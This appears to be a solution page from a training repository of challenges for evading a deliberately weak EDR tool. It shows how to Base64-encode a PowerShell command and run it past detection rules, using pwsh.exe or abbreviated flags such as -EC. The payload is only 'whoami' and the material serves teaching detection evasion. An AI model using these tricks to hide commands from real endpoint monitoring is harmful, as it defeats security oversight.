Files
BenjiTrapp-MostShittyEDR/_solutions/08-base64-encoding.md
T
Der BenjiandClaude Opus 4.6 c37272daa6 Fix 404s: move challenges/solutions to Jekyll collections (_prefix)
Jekyll collections require the underscore-prefixed directory naming
convention (_challenges, _solutions). Move files accordingly, extract
index pages to root with proper permalinks, and fix defaults scope
in _config.yml to use type-based matching.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-07-15 10:14:35 +02:00

1.3 KiB

title, difficulty, category
title difficulty category
Solution 08: Base64 Encoded Commands medium Command Line Obfuscation

[Back to Challenge]({{ '/challenges/08-base64-encoding/' | relative_url }})

Overview

PowerShell accepts Base64-encoded commands via -EncodedCommand. The EDR checks for -encodedcommand and -enc but not for abbreviated variants.

Solution

# Encode the command
$cmd = "Invoke-Expression 'whoami'"
$bytes = [Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)

# Method 1: Use pwsh.exe (bypasses Rule 5 entirely)
pwsh.exe -EncodedCommand $encoded

# Method 2: Use parameter abbreviation
# "-encodedcommand" is detected, but "-EC" or "-Enco" is not
powershell.exe -EC $encoded
powershell.exe -Enco $encoded

# Method 3: Use the full parameter with different casing
# Rule 2 uses toLowerAscii but the flag list has "-encodedcommand"
# Since toLowerAscii is used, casing alone won't help for Rule 2.
# But combining with pwsh.exe bypasses Rule 5:
pwsh.exe -EncodedCommand $encoded

Why It Works

Rule 5 only checks processes named powershell.exe. Using pwsh.exe bypasses it completely. PowerShell also accepts flag abbreviations that aren't in the detection list.

The encoded command payload (Base64) does not contain the original keyword strings, so Rule 2 is also bypassed.